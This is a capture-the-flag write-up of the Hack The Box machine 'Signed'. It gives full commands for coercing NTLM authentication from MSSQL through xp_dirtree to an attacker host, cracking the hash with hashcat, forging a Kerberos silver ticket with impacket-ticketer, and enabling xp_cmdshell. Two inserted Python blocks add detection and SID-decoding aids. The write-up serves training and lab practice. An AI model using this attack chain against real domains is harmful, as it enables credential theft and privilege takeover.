Signed - Hack The Box
Platform: Windows
IP: 10.129.203.27
Difficulty: Medium
Author: NoSec
Recon
nmap -sVC 10.129.203.27
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-11 21:41 CEST
Nmap scan report for 10.129.203.27
Host is up (0.029s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.129.203.27:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.203.27:1433:
| Target_Name: SIGNED
| NetBIOS_Domain_Name: SIGNED
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SIGNED.HTB
| DNS_Computer_Name: DC01.SIGNED.HTB
| DNS_Tree_Name: SIGNED.HTB
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-10-11T19:42:23+00:00; +23s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-11T19:16:20
|_Not valid after: 2055-10-11T19:16:20
Host script results:
|_clock-skew: mean: 22s, deviation: 0s, median: 22s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.77 seconds
Initial Access
MSSQL Initial Credentials
Initial credentials provided:
Username: scott
Password: Sm230#C5NatH
Connect to MSSQL:
impacket-mssqlclient scott:'Sm230#C5NatH'@10.129.203.27
Logged in as the guest user with minimal privileges.
NTLM Hash Capture & Cracking
Responder Setup
Since MSSQL allows extended stored procedures, we can force the server to authenticate to our machine:
# Start Responder
sudo responder -I tun0
Coerce Authentication from MSSQL
Using xp_dirtree to trigger an SMB connection from the SQL Server:
EXEC xp_dirtree '\\10.10.14.96\share';
Captured NTLMv2 Hash
Responder captured the authentication attempt:
[SMB] NTLMv2-SSP Client : 10.129.170.123
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:9bade5d933cee1b4:091BE064ACDC3C5EF68AFAAA<HASH>
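The coercion above is a plain T-SQL statement, so it is visible wherever statement text is logged. The following detection sketch is an added example, not code from the original writeup: it flags xp_dirtree calls whose UNC target is a raw IP or a host outside an allow-list. The allow-list hosts and the (login, statement) record format are assumptions, and the sample records are constructed, the first one mirroring the statement shown on this page.

```python
import re

# Extended stored procedure this page shows being abused for coercion; extend the
# set with any other file-reaching procedure your environment monitors.
COERCION_PROCS = {"xp_dirtree"}
# Hypothetical allow-list of file servers the SQL Server may legitimately reach.
ALLOWED_UNC_HOSTS = {"dc01.signed.htb", "fileserver.signed.htb"}
UNC_RE = re.compile(r"\\\\([^\\\s'\";]+)")          # \\host\share -> host
IP_LITERAL_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def called_procs(statement):
    """Coercion-capable procedures named in a T-SQL statement."""
    return sorted({w.lower() for w in re.findall(r"\bxp_\w+", statement)} & COERCION_PROCS)

def unc_hosts(statement):
    """Every UNC host referenced in the statement, lower-cased."""
    return [h.lower() for h in UNC_RE.findall(statement)]

def classify(statement):
    """Reason string if the statement looks like an authentication coercion
    attempt (xp_dirtree pointed at a raw IP or an unapproved host), else None."""
    if not called_procs(statement):
        return None
    for host in unc_hosts(statement):
        if IP_LITERAL_RE.match(host):
            return "unc_target_is_raw_ip:" + host
        if host not in ALLOWED_UNC_HOSTS:
            return "unc_target_not_allowed:" + host
    return None

def scan(records):
    """records: (login_name, statement) pairs as a SQL Server audit or Extended
    Events session would capture them. Returns (login, reason, statement) hits."""
    hits = []
    for login, stmt in records:
        reason = classify(stmt)
        if reason:
            hits.append((login, reason, stmt))
    return hits

# Constructed sample records; the first mirrors the statement shown on this page.
SAMPLE = [
    ("guest", r"EXEC xp_dirtree '\\10.10.14.96\share';"),
    ("SIGNED\\backupsvc", r"EXEC xp_dirtree '\\fileserver.signed.htb\backups', 1, 1;"),
    ("scott", "SELECT name FROM sys.databases;"),
]

if __name__ == "__main__":
    for login, reason, stmt in scan(SAMPLE):
        print(f"ALERT login={login} reason={reason} stmt={stmt}")
```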
Crack the Hash
hashcat -m 5600 mssqlsvc.hash /usr/share/wordlists/rockyou.txt
Cracked Password: pur<PASS>
Authenticate with Domain Credentials
impacket-mssqlclient -windows-auth SIGNED/mssqlsvc:'pur<PASS>'@10.129.203.27
Still logged in as the guest user, but now we have valid domain credentials for mssqlsvc.
SQL Server Principals
SELECT r.name AS role_name, mp.name AS member_name
FROM sys.server_role_members srm
JOIN sys.server_principals r ON srm.role_principal_id = r.principal_id
JOIN sys.server_principals mp ON srm.member_principal_id = mp.principal_id
WHERE r.name = 'sysadmin';
Notable finding: the SIGNED\IT group has the sysadmin role!
SELECT srv.server_id, srv.name FROM sys.servers srv WHERE srv.name IN ('DC01',@@SERVERNAME);
Found linked server: DC01
Privilege Escalation Path
Domain SID Extraction
SELECT SUSER_SID();
SID (hex): b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'
Converting to readable format:
- Domain SID: S-1-5-21-4089266779-11675<SID>
- User RID: 1103
IT Group SID Discovery
SELECT name, sid FROM sys.server_principals WHERE name = 'SIGNED\IT';
IT Group SID: b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'
- IT Group RID: 1105
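The SID conversion above is easy to do by hand once, but a reviewer of sys.server_principals will do it repeatedly. The helper below is an added example, not code from the original writeup: it decodes the binary SIDs the page prints for SUSER_SID() and SIGNED\IT into S-1-5-21-... form, extracts the RIDs (1103 and 1105) and confirms both share one domain prefix. The page partially redacts its printed SID, so the decoded sub-authorities are whatever the shown hex bytes encode.

```python
import struct

# Hex strings exactly as the page shows them for SUSER_SID() and for SIGNED\IT
# in sys.server_principals (the page's printed decimal SID is partly redacted).
USER_SID_HEX = "0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000"
IT_GROUP_SID_HEX = "0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000"

def parse_sid(raw):
    """Decode a binary Windows SID into its S-R-I-S-... string form.
    Layout: revision (1 byte), sub-authority count (1 byte), 48-bit big-endian
    identifier authority, then count x 32-bit little-endian sub-authorities."""
    if isinstance(raw, str):
        raw = bytes.fromhex(raw)
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if revision != 1 or len(raw) != 8 + 4 * count:
        raise ValueError("malformed SID (revision %d, %d bytes for %d sub-authorities)"
                         % (revision, len(raw), count))
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))

def split_sid(sid):
    """Split 'S-1-5-21-a-b-c-rid' into (domain_sid, rid)."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)

def same_domain(sid_a, sid_b):
    """True when two SIDs share the domain prefix, i.e. only the RID differs.
    This is the check behind 'the domain SID must be correct'."""
    return split_sid(sid_a)[0] == split_sid(sid_b)[0]

if __name__ == "__main__":
    user = parse_sid(USER_SID_HEX)
    group = parse_sid(IT_GROUP_SID_HEX)
    print("user SID :", user, "-> RID", split_sid(user)[1])
    print("IT SID   :", group, "-> RID", split_sid(group)[1])
    print("same domain:", same_domain(user, group))
```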
Silver Ticket Attack
Prerequisites
For Silver Ticket generation, we need:
1. ✅ Service account NTLM hash (mssqlsvc)
2. ✅ Domain SID
3. ✅ Target user (Administrator - RID 500)
4. ✅ Service Principal Name (SPN)
Calculate NTLM Hash
python3 -c 'import hashlib; print(hashlib.new("md4", "purPL<PASS>".encode("utf-16le")).hexdigest())'
Note: hashlib only exposes md4 where OpenSSL provides it; on OpenSSL 3 systems without the legacy provider loaded, hashlib.new("md4") raises an error.
NTLM Hash: ef699384c3285c5<HASH>
Critical Discovery: IT Group Membership
The key to success was including the IT group RID (1105) in the ticket's group memberships, since SIGNED\IT
has sysadmin privileges on MSSQL.
Generate Silver Ticket
impacket-ticketer \
-nthash ef699384c3285c5<HASH> \
-domain SIGNED.HTB \
-domain-sid S-1-5-21-4089266779-1167590040-2748827309 \
-user-id 500 \
-groups 512,1105 \
-spn MSSQLSvc/DC01.SIGNED.HTB:1433 \
Administrator
Key Parameters:
- -user-id 500: Built-in Administrator RID
- -groups 512,1105: Domain Admins (512) + IT Group (1105)
- -spn: Service Principal Name for MSSQL
Export and Authenticate
export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient -k DC01.SIGNED.HTB
Success! Authenticated as SIGNED\Administrator with dbo privileges (not guest).
User Flag
Verify Privileges
SELECT IS_SRVROLEMEMBER('sysadmin');
-- Returns: 1 (True)
Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Read User Flag
EXEC xp_cmdshell 'type C:\Users\mssqlsvc\Desktop\user.txt';
Key Takeaways
- Silver Ticket attacks can forge service tickets without contacting the KDC
- Group membership in the ticket's PAC is critical - the IT group RID (1105) was essential for sysadmin access
- Only the MSSQL port was open, making this a pure database exploitation challenge
- Domain SID must be correct for the ticket to be accepted
- xp_dirtree can be used to coerce NTLM authentication and capture hashes via Responder
- Even with limited initial access (guest user), privilege escalation is possible through Kerberos ticket forgery
Tools Used
- nmap - Port scanning and service enumeration
- Responder - NTLM hash capture
- hashcat - Password cracking
- impacket-mssqlclient - MSSQL client with Kerberos support
- impacket-ticketer - Silver Ticket generation
- Python - NTLM hash calculation